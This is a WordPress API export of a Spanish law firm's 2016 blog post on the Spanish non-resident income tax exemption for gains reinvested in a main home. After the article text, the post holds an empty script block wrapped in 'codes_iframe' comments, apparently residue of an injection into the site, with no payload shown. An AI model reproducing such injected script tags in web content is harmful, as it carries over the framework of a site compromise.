{"id":11764,"date":"2016-07-04T10:57:39","date_gmt":"2016-07-04T08:57:39","guid":{"rendered":"http:\/\/fmsb.disstintbeta.com\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/"},"modified":"2016-07-04T10:57:39","modified_gmt":"2016-07-04T08:57:39","slug":"irnr-y-la-exencion-por-reinversion-en-vivienda-habitual","status":"publish","type":"post","link":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/","title":{"rendered":"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual."},"content":{"rendered":"<h3 style=\"text-align: justify;\">El impuesto sobre la renta de no residentes y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual.<\/h3>\n<p style=\"text-align: justify;\">El Impuesto sobre la Renta de los no Residentes (IRNR) se encuentra regulado en el Real Decreto Legislativo 5\/2005, de 5 de marzo. El cual, en su Disposici\u00f3n Adicional S\u00e9ptima, prev\u00e9 que se excluyan de gravamen las ganancias patrimoniales derivadas de transmisi\u00f3n de la vivienda habitual en caso de inversi\u00f3n en los siguientes t\u00e9rminos: \u201c<em>Podr\u00e1n excluirse de gravamen las ganancias patrimoniales obtenidas por los contribuyentes residentes en un Estado miembro de la Uni\u00f3n Europea por la transmisi\u00f3n de la que haya sido su vivienda habitual en Espa\u00f1a, siempre que el importe total obtenido por la transmisi\u00f3n se reinvierta en la adquisici\u00f3n de una nueva vivienda habitual. Cuando el importe reinvertido sea inferior al total de lo percibido en la transmisi\u00f3n, \u00fanicamente se excluir\u00e1 de tributaci\u00f3n la parte proporcional de la ganancia patrimonial obtenida que corresponda a la cantidad reinvertida.\u201d<\/em><\/p>\n<p style=\"text-align: justify;\">Lo interesante de dicha exenci\u00f3n es que otorga a aquellos residentes en otros pa\u00edses comunitarios o de un Estado miembro del Espacio Econ\u00f3mico Europeo con el que exista un efectivo intercambio de informaci\u00f3n tributaria (apartado cuarto de la DA 7\u00aa, que a la postre consiste en pa\u00edses <strong>UE m\u00e1s Islandia y Noruega<\/strong>) del privilegio que supone la exenci\u00f3n prevista en el art. 38 de la LIRPF para los residentes. Lo cual, goza de todav\u00eda m\u00e1s inter\u00e9s si tenemos en cuenta la cantidad de espa\u00f1oles que han emigrado al extranjero debido a la crisis.<\/p>\n<p style=\"text-align: justify;\">A pesar de todo, conviene tener en cuenta los principales l\u00edmites en la aplicaci\u00f3n de la exenci\u00f3n. El primero, de naturaleza territorial, cabe recordar que el no residente debe residir en alguno de los pa\u00edses miembros de la UE o EEE \u2013vid. Supra-. El segundo l\u00edmite es de naturaleza temporal y act\u00faa tanto a la hora de fijar dos elementos clave como:<\/p>\n<ul style=\"text-align: justify;\">\n<li>El concepto de <strong>vivienda habitual <\/strong>pues, a efectos fiscales, se considera vivienda habitual del contribuyente la\u00a0edificaci\u00f3n que constituya su residencia durante un plazo continuado de, al menos, tres a\u00f1os. Siendo preciso que sea habitada de manera efectiva y con car\u00e1cter permanente por el propio contribuyente, en un plazo de doce meses\u00a0, contados a partir de la fecha de adquisici\u00f3n o terminaci\u00f3n de las obras.<\/li>\n<\/ul>\n<ul style=\"text-align: justify;\">\n<li>El <strong>plazo de reinversi\u00f3n<\/strong>, pues la reinversi\u00f3n del importe obtenido en la enajenaci\u00f3n deber\u00e1 efectuarse, de una sola vez o sucesivamente, en un per\u00edodo no superior a dos a\u00f1os, contados de fecha a fecha.<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Finalmente, en caso de <strong>reinversi\u00f3n parcial,<\/strong> esto es, si el importe de la reinversi\u00f3n fuera inferior al total obtenido en la enajenaci\u00f3n, solamente se excluir\u00e1 de gravamen la parte proporcional de la ganancia patrimonial que corresponda a la cantidad efectivamente reinvertida.<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\">                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El impuesto sobre la renta de no residentes y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. El Impuesto sobre la Renta de los no Residentes (IRNR) se encuentra regulado en el Real Decreto Legislativo 5\/2005, de 5 de marzo. El cual, en su Disposici\u00f3n Adicional S\u00e9ptima, prev\u00e9 que se excluyan de gravamen las ganancias patrimoniales [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8602,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2250,2152],"tags":[],"class_list":["post-11764","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-derecho-fiscal-en","category-home-en-2"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. - FMSB Abogados y Economistas en Baleares<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. - FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"og:description\" content=\"El impuesto sobre la renta de no residentes y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. El Impuesto sobre la Renta de los no Residentes (IRNR) se encuentra regulado en el Real Decreto Legislativo 5\/2005, de 5 de marzo. El cual, en su Disposici\u00f3n Adicional S\u00e9ptima, prev\u00e9 que se excluyan de gravamen las ganancias patrimoniales [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/\" \/>\n<meta property=\"og:site_name\" content=\"FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"article:published_time\" content=\"2016-07-04T08:57:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"500\" \/>\n\t<meta property=\"og:image:height\" content=\"334\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"fmsb\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@fmsb-disstint\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"fmsb\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/\"},\"author\":{\"name\":\"fmsb\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\"},\"headline\":\"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual.\",\"datePublished\":\"2016-07-04T08:57:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/\"},\"wordCount\":503,\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg\",\"articleSection\":[\"Derecho Fiscal\",\"Home\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/\",\"name\":\"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. - FMSB Abogados y Economistas en Baleares\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg\",\"datePublished\":\"2016-07-04T08:57:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/#primaryimage\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/07\\\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg\",\"width\":500,\"height\":334},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/07\\\/04\\\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"width\":154,\"height\":52,\"caption\":\"FMSB Abogados y Economistas en Baleares\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\",\"name\":\"fmsb\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"caption\":\"fmsb\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/fmsb-disstint\"],\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/author\\\/fmsb\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. - FMSB Abogados y Economistas en Baleares","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/","og_locale":"en_US","og_type":"article","og_title":"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. - FMSB Abogados y Economistas en Baleares","og_description":"El impuesto sobre la renta de no residentes y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. El Impuesto sobre la Renta de los no Residentes (IRNR) se encuentra regulado en el Real Decreto Legislativo 5\/2005, de 5 de marzo. El cual, en su Disposici\u00f3n Adicional S\u00e9ptima, prev\u00e9 que se excluyan de gravamen las ganancias patrimoniales [&hellip;]","og_url":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/","og_site_name":"FMSB Abogados y Economistas en Baleares","article_published_time":"2016-07-04T08:57:39+00:00","og_image":[{"width":500,"height":334,"url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg","type":"image\/jpeg"}],"author":"fmsb","twitter_card":"summary_large_image","twitter_creator":"@fmsb-disstint","twitter_misc":{"Written by":"fmsb","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/#article","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/"},"author":{"name":"fmsb","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2"},"headline":"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual.","datePublished":"2016-07-04T08:57:39+00:00","mainEntityOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/"},"wordCount":503,"publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg","articleSection":["Derecho Fiscal","Home"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/","url":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/","name":"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual. - FMSB Abogados y Economistas en Baleares","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/#primaryimage"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg","datePublished":"2016-07-04T08:57:39+00:00","breadcrumb":{"@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/#primaryimage","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/07\/cuando-empieza-a-contar-la-exencion-por-reinversion-en-vivienda-habitual.jpg","width":500,"height":334},{"@type":"BreadcrumbList","@id":"https:\/\/fmsb.eu\/en\/2016\/07\/04\/irnr-y-la-exencion-por-reinversion-en-vivienda-habitual\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/fmsb.eu\/en\/"},{"@type":"ListItem","position":2,"name":"IRNR y la exenci\u00f3n por reinversi\u00f3n en vivienda habitual."}]},{"@type":"WebSite","@id":"https:\/\/fmsb.eu\/en\/#website","url":"https:\/\/fmsb.eu\/en\/","name":"FMSB Abogados y Economistas en Baleares","description":"","publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fmsb.eu\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/fmsb.eu\/en\/#organization","name":"FMSB Abogados y Economistas en Baleares","url":"https:\/\/fmsb.eu\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","width":154,"height":52,"caption":"FMSB Abogados y Economistas en Baleares"},"image":{"@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2","name":"fmsb","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","caption":"fmsb"},"sameAs":["https:\/\/x.com\/fmsb-disstint"],"url":"https:\/\/fmsb.eu\/en\/author\/fmsb\/"}]}},"_links":{"self":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11764","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/comments?post=11764"}],"version-history":[{"count":0,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11764\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media\/8602"}],"wp:attachment":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media?parent=11764"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/categories?post=11764"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/tags?post=11764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}